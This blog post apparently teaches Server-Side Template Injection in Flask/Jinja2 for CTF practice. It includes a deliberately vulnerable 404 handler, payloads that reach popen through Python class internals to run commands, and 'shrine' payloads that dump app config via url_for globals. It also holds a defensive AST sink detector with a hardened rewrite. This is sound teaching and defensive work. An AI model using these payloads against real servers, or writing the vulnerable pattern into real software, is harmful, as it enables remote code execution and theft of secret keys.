SSTI template injection explanation and real problem practice
2022-07-06 03:47:00 【Advertising fever】
0x00 SSTI
1. What is SSTI injection?
SSTI (Server-Side Template Injection) abuses the input/output interaction between user-supplied data and the server-side template engine: when input is not strictly filtered, an attacker can construct malicious input that the template engine evaluates, which leads to file reads or getshell. In current CTF challenges, SSTI questions mostly target Python template engines.
2. Causes and exploitation conditions
A website builds its output pages from data plus a template framework: the data in the database does not change, but the same data can be rendered through different templates to give different visual results. When the template contains a parameter the user can control, or the template code exposes template debugging features, SSTI becomes possible. This class of injection exists for most scripting languages; in CTF it is most often tested against Python.
3. What are the hazards?
File reading, command execution, code execution, and so on.
Payload analysis reference:
0x01 Understanding SSTI through a case
Sensitive functions to look for:
flask
render_template_string
Python case:
```python
from flask import Flask
from flask import request
from flask import render_template_string

app = Flask(__name__)
app.config['SECRET_KEY'] = "flag{SSTI_123456}"


@app.route('/')
def hello_world():
    return 'Hello World!'


@app.errorhandler(404)
def page_not_found(e):
    # %s is replaced with the raw value of the 404_url query parameter before
    # the template is parsed, so the user controls part of the template itself:
    # this is the injection point.
    template = '''
{%% block body %%}
  <div class="center-content error">
    <h1>Oops! That page doesn't exist.</h1>
    <h3>%s</h3>
  </div>
{%% endblock %%}
''' % (request.args.get('404_url'))
    return render_template_string(template), 404


if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True)
```
Because the template is rendered by the Python interpreter, the injected expression is evaluated on the server. With a suitable payload this becomes RCE: reading files and operating the machine, for example by reaching popen through the globals of the os._wrap_close class:
```
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('whoami').read()
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__.popen('whoami').read()
```
(The index 128 is specific to the environment the article was written in; the position of os._wrap_close in __subclasses__() changes with the Python version and the modules loaded.)
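As an added example (not code from the original post), the following stdlib-only static check looks for the sink pattern of the case above: `render_template_string` called with a template assembled at runtime (`%` formatting, concatenation, `str.format`, an f-string) instead of a constant template with the user value passed in as context. The `_Finder` class, `find_ssti_sinks` and the two sample sources are constructed for this illustration.

```python
# Added example, not from the original post; names and samples are constructed.
import ast

SINK = "render_template_string"   # the Flask sink the post discusses

class _Finder(ast.NodeVisitor):
    # Tracks ``name = <expr>`` assignments so a template passed by variable can be traced.
    def __init__(self):
        self.assigned = {}   # variable name -> last assigned expression
        self.findings = []   # (line number, reason)

    def visit_Assign(self, node):
        for target in node.targets:
            if isinstance(target, ast.Name):
                self.assigned[target.id] = node.value
        self.generic_visit(node)

    def visit_Call(self, node):
        func = node.func
        name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
        if name == SINK and node.args:
            reason = self._dynamic_reason(node.args[0])
            if reason:
                self.findings.append((node.lineno, reason))
        self.generic_visit(node)

    def _dynamic_reason(self, expr):
        if isinstance(expr, ast.Name):               # follow a local variable
            expr = self.assigned.get(expr.id, expr)
        if isinstance(expr, ast.Constant):           # literal template: user data
            return None                              # can only arrive via context
        if isinstance(expr, ast.BinOp) and isinstance(expr.op, (ast.Mod, ast.Add)):
            return "template built with % formatting or concatenation"
        return "template is not a constant (f-string, str.format, call result, ...)"

def find_ssti_sinks(source: str):
    """(line, reason) for each sink call whose template is assembled at runtime."""
    finder = _Finder()
    finder.visit(ast.parse(source))
    return finder.findings

# Constructed samples: the post's handler, then a hardened rewrite (constant template, value as context).
VULNERABLE = '''def page_not_found(e):
    template = "<h3>%s</h3>" % request.args.get("404_url")
    return render_template_string(template), 404
'''
HARDENED = '''def page_not_found(e):
    template = "<h3>{{ url }}</h3>"
    return render_template_string(template, url=request.args.get("404_url")), 404
'''
```

Running `find_ssti_sinks(VULNERABLE)` reports the return line of the post's handler, while the hardened rewrite produces no finding because Jinja treats the context value as data rather than template code.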
0x02 CTF case
https://buuoj.cn/
Challenge page:
Construct 2-2 and see the result evaluated, which confirms that SSTI is present.
View all global variables, then reference them.
Use the global variables to read the config value as shown below.
url_for() builds the URL for the specified view function.
get_flashed_messages() retrieves the messages passed (flashed) to the template.
Get the global variables:
```
/shrine/{{url_for.__globals__}}
```
or
```
/shrine/{{get_flashed_messages.__globals__}}
```
Use the global variable obtained above to read the config:
```
/shrine/{{url_for.__globals__['current_app'].config}}
```
or
```
/shrine/{{get_flashed_messages.__globals__['current_app'].config}}
```
Addendum: pyc decompilation knowledge points
pyc is another form of packaged script, similar to:
aspx: DLL files
java: .class/jar/war files
pyc can be decompiled; there are also harder-to-decompile formats such as pyd files.
pyc decompilation references:
Online decompilation platforms:
https://tool.lu/pyc/
http://tools.bugscaner.com/decompyle/
Decompiler: https://github.com/wibiti/uncompyle2